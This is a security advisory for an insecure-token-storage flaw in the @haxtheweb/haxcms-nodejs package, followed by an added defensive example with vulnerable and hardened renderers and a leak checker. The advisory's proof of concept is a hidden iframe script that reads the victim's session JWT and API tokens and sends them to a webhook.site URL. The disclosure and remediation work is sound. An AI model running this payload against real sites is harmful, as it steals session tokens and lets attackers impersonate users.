Insecure Storage of Sensitive Information Affecting @haxtheweb/haxcms-nodejs package, versions <26.0.0


Severity: high (CVSS assessment by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of Concept
EPSS: 0.07% (22nd percentile)

  • Snyk ID: SNYK-JS-HAXTHEWEBHAXCMSNODEJS-17179547
  • Published: 5 Jun 2026
  • Disclosed: 19 May 2026
  • Credit: trigerman

Introduced: 19 May 2026

CVE-2026-46511
CWE-922

How to fix?

Upgrade @haxtheweb/haxcms-nodejs to version 26.0.0 or higher.

Overview

@haxtheweb/haxcms-nodejs is the HAXcms Node.js backend.

Affected versions of this package are vulnerable to Insecure Storage of Sensitive Information via the connectionSettings function. The /system/api/connectionSettings endpoint returns a script that assigns the current user's session data, including the session JWT, the user_token and site_token query parameters embedded in API paths, and the appstore_token, to a global JavaScript variable. Because that response is fetchable by any script running in the application's origin, an attacker who can inject script (the PoC below uses an iframe srcdoc) can read the tokens, exfiltrate them to an external server, and use them to impersonate the victim.

PoC

<iframe srcdoc="<script>
    const targetUsername = 'bto108'; // Replace with target victim

    // Same-origin request: the srcdoc frame inherits the parent's origin,
    // so the victim's session cookies are sent automatically.
    fetch(`/${targetUsername}/system/api/connectionSettings`)
      .then(res => res.text())
      .then(data => {
          // The response is a script that assigns a global variable;
          // carve out the object literal and parse it as JSON.
          const s = JSON.parse(data.substring(data.indexOf('{'), data.lastIndexOf('}') + 1));

          // user_token and site_token travel as query parameters on API paths.
          const uToken = new URL(document.location.origin + s.getUserDataPath).searchParams.get('user_token');
          const sToken = new URL(document.location.origin + s.saveNodePath).searchParams.get('site_token');

          let aToken = 'N/A';
          if (s.appStore && s.appStore.params && s.appStore.params.appstore_token) {
              aToken = s.appStore.params.appstore_token;
          }

          // Exfiltrate via an image GET: a no-cors request that needs no
          // CORS approval from the receiving server.
          const payload = btoa(JSON.stringify({
              target: targetUsername,
              jwt: s.jwt,
              user_token: uToken,
              site_token: sToken,
              appstore_token: aToken
          }));

          new Image().src = `https://webhook.site/YOUR-WEBHOOK-ID?data=${payload}`;
      });
</script>" style="display:none"></iframe>
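The following is an added example, not code from haxcms-nodejs or from the advisory. It models the pattern described above, a connection-settings response that serialises session tokens into a script assigning a global variable, next to a hardened variant that carries only non-secret routing configuration, and a checker that scans such a response body for leaked tokens so the fix can be verified after upgrading. The field names (jwt, getUserDataPath, saveNodePath, appStore.params.appstore_token) come from the PoC; the handler shapes, the session object and the token values are assumptions.

```javascript
// Added example (not haxcms-nodejs code). Node.js, no dependencies.

// Constructed sample session used by both handlers (assumed shape).
const SAMPLE_SESSION = {
  user: 'bto108',
  jwt: 'eyJhbGciOiJIUzI1NiJ9.e30.c2lnbmF0dXJl',
  userToken: 'ut-4f2c9a',
  siteToken: 'st-91bd03',
  appstoreToken: 'at-7e11c0',
};

// Vulnerable pattern: bearer tokens serialised into a global that any
// same-origin script can fetch and parse (the shape the PoC relies on).
function renderConnectionSettingsVulnerable(session) {
  const settings = {
    jwt: session.jwt,
    getUserDataPath: `/${session.user}/system/api/getUserData?user_token=${session.userToken}`,
    saveNodePath: `/${session.user}/system/api/saveNode?site_token=${session.siteToken}`,
    appStore: { url: '/system/api/appStore', params: { appstore_token: session.appstoreToken } },
  };
  return `window.appSettings = ${JSON.stringify(settings)};`;
}

// Hardened pattern: the script carries only routing config. Authentication
// is assumed to ride on an HttpOnly, SameSite session cookie set separately
// by the server, so injected script has no token to read or exfiltrate.
function renderConnectionSettingsHardened(session) {
  const settings = {
    getUserDataPath: `/${session.user}/system/api/getUserData`,
    saveNodePath: `/${session.user}/system/api/saveNode`,
    appStore: { url: '/system/api/appStore', params: {} },
  };
  return `window.appSettings = ${JSON.stringify(settings)};`;
}

// Checker: given a connectionSettings response body, return the dotted
// paths of every token-bearing field. Walks the parsed object and also
// inspects query strings of path-valued fields, where the PoC found
// user_token and site_token.
const TOKEN_KEYS = new Set(['jwt', 'user_token', 'site_token', 'appstore_token', 'token']);

function findLeakedTokens(body) {
  const start = body.indexOf('{');
  const end = body.lastIndexOf('}');
  if (start < 0 || end < start) return [];
  const settings = JSON.parse(body.slice(start, end + 1));
  const leaks = [];
  const walk = (value, path) => {
    if (value && typeof value === 'object') {
      for (const [k, v] of Object.entries(value)) walk(v, path ? `${path}.${k}` : k);
      return;
    }
    const key = path.split('.').pop();
    if (TOKEN_KEYS.has(key) && value) leaks.push(path);
    if (typeof value === 'string' && value.startsWith('/')) {
      // Relative API path: any token passed as a query parameter is a leak.
      const url = new URL(value, 'https://example.invalid'); // placeholder base for parsing
      for (const [param, val] of url.searchParams) {
        if (TOKEN_KEYS.has(param) && val) leaks.push(`${path}?${param}`);
      }
    }
  };
  walk(settings, '');
  return leaks;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable:', findLeakedTokens(renderConnectionSettingsVulnerable(SAMPLE_SESSION)));
  console.log('hardened:', findLeakedTokens(renderConnectionSettingsHardened(SAMPLE_SESSION)));
}
```

Run against the vulnerable rendering, the checker reports jwt, getUserDataPath?user_token, saveNodePath?site_token and appStore.params.appstore_token; against the hardened rendering it reports nothing. Pointing the same checker at a live /system/api/connectionSettings response after upgrading to 26.0.0 is a quick regression check that no bearer token is still reachable from JavaScript.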
